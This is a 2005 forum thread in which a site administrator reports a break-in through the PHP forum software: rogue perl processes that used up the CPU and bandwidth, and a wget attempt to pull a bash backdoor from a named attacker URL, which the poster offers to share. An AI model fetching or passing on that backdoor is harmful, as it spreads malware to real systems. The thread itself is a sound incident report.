The Nightstar Zoo

Nightstar IRC Network - irc.nightstar.net
It is currently Fri Mar 24, 2017 3:05 pm

All times are UTC - 6 hours [ DST ]

PostPosted: Thu May 12, 2005 11:53 am 
Knight of Daisies, Tulip Slayer

At 22:11 Central time, someone attempted to exploit a bug somewhere in the system - my guess is that they hit the PHPNuke or PHPBB code on Nightstar.

The hack spawned off two perl processes, one called ' sik ' and the other called ' [EntropyClient] '.

Between them, they maxed out the CPU, and somehow maxed out the bandwidth as well.

Once connected, the process used wget to attempt to find this file.

http://myshellz.com/xpl/backdoors/bash

(which does exist, I haven't had a chance to look at it - anyone that wants a copy, let me know - I downloaded it.)

Luckily, because I'm reasonably paranoid about apache, the process they were running as was 'nobody', which has no rights to be able to escalate itself and replace /bin/bash.

I was actually aware that this was going on within approximately 60 seconds, and had logged into the box to check it. Unfortunately, right as I was killing the processes, they maxed out the bandwidth and my command couldn't go through. I had to manually go to the box.

By 23:30, I'd reached the box, killed the processes, and gotten everything restarted.

However - as part of trying to make sure they couldn't repeat that, I put in updates for apache, php, and several other packages. The PHP package upgrade conflicted with the version of MySQL I put in, so I didn't realize that the zoo wasn't functioning.

This morning, I identified the problem and reverted the php.

However, the code in the zoo will probably have to be looked at.

BW

PostPosted: Sun Jul 24, 2005 7:20 pm 
Some long-forgotten guide to Apache wrote:
Question: Why does Apache run as "nobody" by default?
Answer: Because it's the only webserver with a <blank>ing clue.

It's nice to see people taking good security precautions in building their webservers. Restores a little of your faith in humanity's sanity, so to speak.